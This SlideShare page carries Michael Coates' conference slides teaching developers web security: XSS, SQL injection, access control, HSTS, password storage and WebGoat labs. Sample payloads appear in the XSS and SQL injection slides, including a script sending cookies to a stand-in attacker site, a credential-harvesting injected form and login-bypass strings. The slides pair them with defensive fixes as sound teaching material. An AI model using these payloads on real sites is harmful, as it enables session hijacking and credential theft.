SlideShare a Scribd company logo

Devbeat Conference - Developer First Security

Michael Coates
Michael Coates

Topics include: - Sample and Demo of Top Application Risks
— Cross Site Scripting, SQL Injection, Access Control - Who’s Monitoring Your Traffic?
— Encrypting in Transit Secure Data Storage & Protection
— Correct Password -Storage & Data Protection -Growing Threats Plaguing Applications

TechnologyBusiness
1 of 64
Download to read offline
Developer-first security Integrating Security into Development Michael Coates ! michael@ShapeSecurity.com michael-coates.blogspot.com @_mwc
About Me michael@shapesecurity.com
Reality
“The global cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine” ! h"p://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking   h"p://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/  
Data Loss & Breaches datalossdb.org Verizon Data Breach Report 2013
Outside Attackers datalossdb.org Verizon Data Breach Report 2013
Security - Into The Details • Sample and Demo of Top Application Risks
 — Cross Site Scripting, SQL Injection, Access Control • Who’s Monitoring Your Traffic?
 — Encrypting in Transit • Secure Data Storage & Protection
 — Correct Password Storage & Data Protection • Growing Threats Plaguing Applications
WARNING Security Testing is ILLEGAL ON UNAUTHORIZED SYSTEMS
3 Dangerous Vulnerabilities Cross Site Scripting SQL Injection Access Control
What are Web Requests Open console & enter the following:
 • 
 telnet google.com 80
 GET / HTTP/1.1 • Hit return 2 times
Cross Site Scripting (XSS) • Problem: User controlled data returned in HTTP response contains HTML/JavaScript code • Impact: Session Hijacking, Full Control of Page, Malicious Redirects • Basic XSS Test:
 " ><script>alert(document.cookie)</script> • Cookie Theft Example:
 "><script>document.location='http://attackersite/ '+document.cookie</script>
XSS Behind The Scenes http://shinypage.com?user=Bob JSP Code <h1>Glad to see you <%= request.getParameter("name") %></h1> HTML Source Rendered HTML <div>Glad to see you <b>Bob</b></div>
XSS Behind The Scenes http://shinypage.com?user=friend</b>
 <br><form method=”post” action=”badsite.com/login”> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
XSS - Injecting HTML Rendered HTML
Cross Site Scripting • Cross Site Scripting typically uses JavaScript to do bad things • Steal session cookies <script>alert(document.cookie)</script> • Redirect to bad pages 
 <script>window.location = "http://evilsite.com/"</script> • Rewrite page on the fly
Lab! - Reflected XSS
Reflected XSS Lab • Lesson: Cross-Site Scripting->Reflected XSS Attacks • Proxy Not Needed
Lab! - Stored XSS
Stored XSS Lab • Lesson: Cross-Site Scripting>Stored XSS Attacks • Proxy Not Needed
XSS Prevention • Solution
 1. Output Encoding - converts command characters to benign characters for display
 2. Input Validation <h1>Glad to see you <%=encodeForHTML( request.getParameter("name") ) %></h1> < > “ ‘ & HTML Encoding &lt; &gt; &quote; &#x27; &amp;
XSS Attempt Revisited http://shinypage.com?user=friend</b>
 <br><form method=”post” action=”badsite.com/login”> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
Safe Handling Rendered HTML Glad to see you friend</b>
 <br><form method="post" action="badsite.com/ login"> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
XSS Resources • OWASP XSS Prevention Cheat Sheet 
 - http://bit.ly/XSS-OWASP • Content Security Policy 
 - http://bit.ly/CSP-OWASP • OWASP XSS Overview 
 - http://bit.ly/OWASPXSS
SQL Injection • Problem: User controlled data improperly used with SQL statements • Impact: Arbitrary SQL Execution, Data Corruption, Data Theft • Basic SQL Injection Tests:
 OR 1=1 --
 ' OR '1'= '1'-- • Example Vulnerable Query:
 sqlQ = “Select user from UserTable where name= '+username+ ' and pass = '+password+ ' ”
Lab! - SQL Lesson
SQL Injection • Lesson: Injection Flaws -> Lab: SQL Injection -> Stage 1: String SQL Injection • Proxy Needed • Objective: Bypass the login page by inserting “control” characters. Login as “Neville” w/o knowledge of the password
SQL Injection • HTTP Post
 employee_id=112&password=x' OR ‘1'='1 &action=Login • Vulnerable SQL
 Select user from UserTable where name= '+username+ ' and pass = '+password+ ‘ • Resulting Statement
 Select user from UserTable where name= '112' and 
 pass = 'x' OR '1'='1' • Result: ... name = ' 112 ' and pass = 'x ' OR TRUE
SQL Injection • Parameterized Queries
 No confusion with control characters
 Example: would look for password of ‘ or ‘1’=’1 • Input Validation
 Are special characters needed for most fields?
 What about non-printable characters %00-%0A?

SQL Injection Resources • https://www.owasp.org/index.php/ SQL_Injection_Prevention_Cheat_Sheet
Access Control • Problem: Developers assume some parts of app can’t be seen, tampered with or invoked by the user • Impact: Unauthorized data access, access to privileged functionality • Basic Access Control Test: Inspect HTTP requests - iterate numbers, guess other values for arguments • Access Control Failure Example:! • http://somebadbank.com/showacct?id=101 • http://somebadbank.com/showacct?id=102

Lab! - Access Control
Access Control Violation • Lesson: Access Control Flaws>LAB: Role Based Access Control->Stage 1: Bypass Business Layer Access Control • Proxy Needed • Objective: Find way to execute “delete” functionality using Tom’s account. Delete account “tom”
Access Control Violation • Hint: Login with Tom and perform available actions (search staff, view profile). Figure out how action name is sent to server POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1 Host: localhost ! employee_id=105&action=ViewProfile
Strong Access Controls • Access Control Performed Server Side • Never Relies Upon “Security by Obscurity” • Be Careful with Identifiers (e.g. id=123) • Attacker Can Send Anything in Request • Presentation Layer Controls Can Not Enforce Access Control
Access Control Resources • https://www.owasp.org/index.php/ Access_Control_Cheat_Sheet
Who’s Monitoring Your Traffic?
Insecure Session Management • Secure login over HTTPS • • Password submitted encrypted Immediate redirect to HTTP • Session ID sent cleartext <-- vulnerability point https://site.com/login http://site.com/profile
Vulnerable Redirects • User requests HTTP page, response redirects HTTPS • 302 Response is HTTP <-- Vulnerability Point
Secure Design for Communication • Use HTTPS Throughout Web Site! • HTTP Strict Transport Security (HSTS)! • • • Opt-in security control Website instructs compatible browser to enable STS for site HSTS Forces (for enabled site): • All communication over HTTPS • No insecure HTTP requests sent from browser • No option for user to override untrusted certificates
Strict Transport Security • Browser prevents HTTP requests to HSTS site • Any request to site is “upgraded” to HTTPS • No clear text HTTP traffic ever sent to HSTS site • Browser assumes HTTPS for HSTS sites
Secure Data Storage & Protection
Password Storage Bad Approaches! • Your own algorithm • Good Approach! md5 encryption • base64 encoding • rot 13 PBKDF2 sha1 • Bcrypt • • • + Per User Salt
What Are We Protecting? Correct password hashing protects against:! ! • Offline attacks of password repository ! • Brute Force, Rainbow Attacks ! Does not address:! Guessing easy passwords Password theft, disclosure Session Hijacking Credential Stuffing
Architecture for Sensitive Data https://site.com web server internal SSL database Monitor Database Queries & Response Size
Encrypting Sensitive Data in Database Encrypt User Data Customer/Group Encryption Key Key Encrypting Key database Decrypt Hardware Security Module Encrypted [Customer/Group Encryption Key] Encryption within Database
 Unique keys per data region
 Key encrypting keys
 Hardware Security Modules (
Growing Threats Plaguing Applications
Denial of Service Denial of Service (DOS) Distributed Denial of Service (DDOS)
Denial of Service Network DDOS Application Layer DDOS site.com/generateReport Exhaust Network! Bandwidth Exhaust Server ! CPU/Memory
Application Denial of Service Application DDOS ! Traditional Network DDOS ! • overwhelms target with volume • • • • exhausts bandwidth / capacity of network devices invokes computationally intense application functions • exhausts CPU / memory of web servers Requires large number of machines • Requires few machines • Defenses: Few available, must customize Defenses: CDN, antiDDOS services
Credential Stuffing compromised! server! Credentials! joe: abc123! sue: password1! bob: MyP0n3y Stolen Credentials! joe: abc123! sue: password1! bob: MyP0n3y sue:password1 joe: abc123 https://site.com/login!
Take Aways • Understand top security threats and anticipate potential malicious use of application to design secure code • Multiple controls possible to protect sensitive data in transit and storage • Understand emerging threats to plan for appropriate defenses • Use OWASP BWA Security Lab and learn more!
Thanks! michael@ShapeSecurity.com http://michael-coates.blogspot.com @_mwc
Virtual Security Training Lab Setup
Software • Vulnerable Server: OWASP’s Webgoat • Proxy Tool - OWASP’s ZAP (Zed Attack Proxy) • Browser • Virtual Machine: OWASP Broken Web App VM
Test Connectivity to VM 1.Open Browser 2.Browse to your VM ip (listed in VM login page) • e.g. http://192.168.56.101 3.Should see OWASP BWA welcome page 4.Error? Check ip address of VM
WebGoat • Click First Link - OWASP WebGoat version 5.3.x • Username / Password is guest / guest
Understanding the Proxy • Proxy is middle-man between browser and web server • Assists with traffic manipulation & inspection Attacker’s Browser Web Proxy Web Server
Understanding the Proxy Primary OS Browser Web Proxy Your Computer VM Web Server
Enabling Proxy 1.Open ZAP 2.Configure Firefox to use proxy 3.Resend Request 4.Confirm received by proxy 5.Forward to web server (vm)
Using A Proxy • ZAP - Configure to listen on 8080
Set Firefox Proxy • Set Firefox proxy to 8080 • Preferences 
 -> Advanced 
 -> Network 
 -> Settings • Set HTTP Proxy • Important - clear 
 “No Proxy for” line
Confirm Setup Works • Refresh Web Browser • Go to ZAP • See site in left-hand column
Intercepting Traffic • Add a “breakpoint” by right clicking on the page and choosing “Break...” ! ! ! ! • Refresh the webpage - it will hang • Modify the request as needed, then press the “Continue” button
“Hello World” of Proxies • Lesson: General->Http Basic • Objective: • Enter your name into text box • Intercept with proxy & change entered name to different value • Receive response & observe modified value is reversed Joe Sue euS Attacker’s euS Web Proxy Browser Web Server

Recommended

2013 michael coates-javaone
2013 michael coates-javaone2013 michael coates-javaone
2013 michael coates-javaoneMichael Coates
 
Self Defending Applications
Self Defending ApplicationsSelf Defending Applications
Self Defending ApplicationsMichael Coates
 
Security in an Interconnected and Complex World of Software
Security in an Interconnected and Complex World of SoftwareSecurity in an Interconnected and Complex World of Software
Security in an Interconnected and Complex World of SoftwareMichael Coates
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Security Innovation
 
Secure Web Services
Secure Web ServicesSecure Web Services
Secure Web ServicesRob Daigneau
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
 
Web application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresAung Thu Rha Hein
 
The Web Application Hackers Toolchain
The Web Application Hackers ToolchainThe Web Application Hackers Toolchain
The Web Application Hackers Toolchainjasonhaddix
 

Recommended

2013 michael coates-javaone
2013 michael coates-javaone2013 michael coates-javaone
2013 michael coates-javaoneMichael Coates
 
Self Defending Applications
Self Defending ApplicationsSelf Defending Applications
Self Defending ApplicationsMichael Coates
 
Security in an Interconnected and Complex World of Software
Security in an Interconnected and Complex World of SoftwareSecurity in an Interconnected and Complex World of Software
Security in an Interconnected and Complex World of SoftwareMichael Coates
 
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...
Modernizing, Migrating & Mitigating - Moving to Modern Cloud & API Web Apps W...Security Innovation
 
Secure Web Services
Secure Web ServicesSecure Web Services
Secure Web ServicesRob Daigneau
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
 
Web application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresWeb application security: Threats & Countermeasures
Web application security: Threats & CountermeasuresAung Thu Rha Hein
 
The Web Application Hackers Toolchain
The Web Application Hackers ToolchainThe Web Application Hackers Toolchain
The Web Application Hackers Toolchainjasonhaddix
 
Chapter 13 web security
Chapter 13 web securityChapter 13 web security
Chapter 13 web securitynewbie2019
 
OWASP Top Ten in Practice
OWASP Top Ten in PracticeOWASP Top Ten in Practice
OWASP Top Ten in PracticeSecurity Innovation
 
OWASP Top Ten 2017
OWASP Top Ten 2017OWASP Top Ten 2017
OWASP Top Ten 2017Michael Furman
 
Security testing presentation
Security testing presentationSecurity testing presentation
Security testing presentationConfiz
 
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksOWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksAll Things Open
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
Application Security-Understanding The Horizon
Application Security-Understanding The HorizonApplication Security-Understanding The Horizon
Application Security-Understanding The HorizonLalit Kale
 
Security Testing Training With Examples
Security Testing Training With ExamplesSecurity Testing Training With Examples
Security Testing Training With ExamplesAlwin Thayyil
 
Web Application Security - DevFest + GDay George Town 2016
Web Application Security - DevFest + GDay George Town 2016Web Application Security - DevFest + GDay George Town 2016
Web Application Security - DevFest + GDay George Town 2016Gareth Davies
 
Top 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajanTop 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajanAkash Mahajan
 
Evil User Stories - Improve Your Application Security
Evil User Stories - Improve Your Application SecurityEvil User Stories - Improve Your Application Security
Evil User Stories - Improve Your Application SecurityAnne Oikarinen
 
Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...
Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...
Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...Ruby Meditation
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
Security testing
Security testingSecurity testing
Security testingKhizra Sammad
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksKun-Da Wu
 
AppSec in an Agile World
AppSec in an Agile WorldAppSec in an Agile World
AppSec in an Agile WorldDavid Lindner
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
ZeroNights2013 testing of password policy
ZeroNights2013 testing of password policyZeroNights2013 testing of password policy
ZeroNights2013 testing of password policyAnton Dedov
 
Anatomy Web Attack
Anatomy Web AttackAnatomy Web Attack
Anatomy Web AttackKelly Speiser
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionMichael Hendrickx
 
SQL Injection and DoS
SQL Injection and DoSSQL Injection and DoS
SQL Injection and DoSEmil Tan
 

More Related Content

What's hot

Chapter 13 web security
Chapter 13 web securityChapter 13 web security
Chapter 13 web securitynewbie2019
 
Security testing presentation
Security testing presentationSecurity testing presentation
Security testing presentationConfiz
 
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksOWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksAll Things Open
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Oles Seheda
 
Application Security-Understanding The Horizon
Application Security-Understanding The HorizonApplication Security-Understanding The Horizon
Application Security-Understanding The HorizonLalit Kale
 
Security Testing Training With Examples
Security Testing Training With ExamplesSecurity Testing Training With Examples
Security Testing Training With ExamplesAlwin Thayyil
 
Web Application Security - DevFest + GDay George Town 2016
Web Application Security - DevFest + GDay George Town 2016Web Application Security - DevFest + GDay George Town 2016
Web Application Security - DevFest + GDay George Town 2016Gareth Davies
 
Top 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajanTop 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajanAkash Mahajan
 
Evil User Stories - Improve Your Application Security
Evil User Stories - Improve Your Application SecurityEvil User Stories - Improve Your Application Security
Evil User Stories - Improve Your Application SecurityAnne Oikarinen
 
Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...
Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...
Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...Ruby Meditation
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksKun-Da Wu
 
AppSec in an Agile World
AppSec in an Agile WorldAppSec in an Agile World
AppSec in an Agile WorldDavid Lindner
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
ZeroNights2013 testing of password policy
ZeroNights2013 testing of password policyZeroNights2013 testing of password policy
ZeroNights2013 testing of password policyAnton Dedov
 

What's hot (19)

Chapter 13 web security
Chapter 13 web securityChapter 13 web security
Chapter 13 web security
 
OWASP Top Ten in Practice
OWASP Top Ten in PracticeOWASP Top Ten in Practice
OWASP Top Ten in Practice
 
OWASP Top Ten 2017
OWASP Top Ten 2017OWASP Top Ten 2017
OWASP Top Ten 2017
 
Security testing presentation
Security testing presentationSecurity testing presentation
Security testing presentation
 
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksOWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
 
Web Security - Introduction v.1.3
Web Security - Introduction v.1.3Web Security - Introduction v.1.3
Web Security - Introduction v.1.3
 
Application Security-Understanding The Horizon
Application Security-Understanding The HorizonApplication Security-Understanding The Horizon
Application Security-Understanding The Horizon
 
Security Testing Training With Examples
Security Testing Training With ExamplesSecurity Testing Training With Examples
Security Testing Training With Examples
 
Web Application Security - DevFest + GDay George Town 2016
Web Application Security - DevFest + GDay George Town 2016Web Application Security - DevFest + GDay George Town 2016
Web Application Security - DevFest + GDay George Town 2016
 
Top 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajanTop 10 web application security risks akash mahajan
Top 10 web application security risks akash mahajan
 
Evil User Stories - Improve Your Application Security
Evil User Stories - Improve Your Application SecurityEvil User Stories - Improve Your Application Security
Evil User Stories - Improve Your Application Security
 
Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...
Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...
Data encryption for Ruby web applications - Dmytro Shapovalov (RUS) | Ruby Me...
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
Security testing
Security testingSecurity testing
Security testing
 
OWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risksOWASP Top 10 - 2017 Top 10 web application security risks
OWASP Top 10 - 2017 Top 10 web application security risks
 
AppSec in an Agile World
AppSec in an Agile WorldAppSec in an Agile World
AppSec in an Agile World
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive Controls
 
ZeroNights2013 testing of password policy
ZeroNights2013 testing of password policyZeroNights2013 testing of password policy
ZeroNights2013 testing of password policy
 
Anatomy Web Attack
Anatomy Web AttackAnatomy Web Attack
Anatomy Web Attack
 

Similar to Devbeat Conference - Developer First Security

The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
SQL Injection and DoS
SQL Injection and DoSSQL Injection and DoS
SQL Injection and DoSEmil Tan
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defenseamiable_indian
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhibhumika2108
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterMichael Coates
 
Defcon9 Presentation2001
Defcon9 Presentation2001Defcon9 Presentation2001
Defcon9 Presentation2001Miguel Ibarra
 
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Jeremiah Grossman
 
XSS (Cross Site Scripting)
XSS (Cross Site Scripting)XSS (Cross Site Scripting)
XSS (Cross Site Scripting)Shubham Gupta
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFBrian Huff
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Become a Security Ninja
Become a Security NinjaBecome a Security Ninja
Become a Security NinjaPaul Gilzow
 
Oracle database threats - LAOUC Webinar
Oracle database threats - LAOUC WebinarOracle database threats - LAOUC Webinar
Oracle database threats - LAOUC WebinarOsama Mustafa
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...IBM Security
 

Similar to Devbeat Conference - Developer First Security (20)

The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: Injection
 
SQL Injection and DoS
SQL Injection and DoSSQL Injection and DoS
SQL Injection and DoS
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
Writing Secure Code – Threat Defense
Writing Secure Code – Threat DefenseWriting Secure Code – Threat Defense
Writing Secure Code – Threat Defense
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
Defcon9 Presentation2001
Defcon9 Presentation2001Defcon9 Presentation2001
Defcon9 Presentation2001
 
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
XSS (Cross Site Scripting)
XSS (Cross Site Scripting)XSS (Cross Site Scripting)
XSS (Cross Site Scripting)
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
Web security and OWASP
Web security and OWASPWeb security and OWASP
Web security and OWASP
 
Become a Security Ninja
Become a Security NinjaBecome a Security Ninja
Become a Security Ninja
 
Lets Make our Web Applications Secure
Lets Make our Web Applications SecureLets Make our Web Applications Secure
Lets Make our Web Applications Secure
 
Oracle database threats - LAOUC Webinar
Oracle database threats - LAOUC WebinarOracle database threats - LAOUC Webinar
Oracle database threats - LAOUC Webinar
 
Mobile_app_security
Mobile_app_securityMobile_app_security
Mobile_app_security
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
 

More from Michael Coates

Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAPVirtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAPMichael Coates
 
Bug Bounty Programs For The Web
Bug Bounty Programs For The WebBug Bounty Programs For The Web
Bug Bounty Programs For The WebMichael Coates
 
SQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterSQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterMichael Coates
 
Real Time Application Defenses - The Reality of AppSensor & ESAPI
Real Time Application Defenses - The Reality of AppSensor & ESAPIReal Time Application Defenses - The Reality of AppSensor & ESAPI
Real Time Application Defenses - The Reality of AppSensor & ESAPIMichael Coates
 

More from Michael Coates (6)

Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAPVirtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
Virtual Security Lab Setup - OWASP Broken Web Apps, Webgoat, & ZAP
 
Sf startup-security
Sf startup-securitySf startup-security
Sf startup-security
 
Bug Bounty Programs For The Web
Bug Bounty Programs For The WebBug Bounty Programs For The Web
Bug Bounty Programs For The Web
 
SQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning CenterSQL Injection - Mozilla Security Learning Center
SQL Injection - Mozilla Security Learning Center
 
Real Time Application Defenses - The Reality of AppSensor & ESAPI
Real Time Application Defenses - The Reality of AppSensor & ESAPIReal Time Application Defenses - The Reality of AppSensor & ESAPI
Real Time Application Defenses - The Reality of AppSensor & ESAPI
 
SSL Screw Ups
SSL Screw UpsSSL Screw Ups
SSL Screw Ups
 

Recently uploaded

Vector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesVector Databases 101 - An introduction to the world of Vector Databases
Vector Databases 101 - An introduction to the world of Vector DatabasesZilliz
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
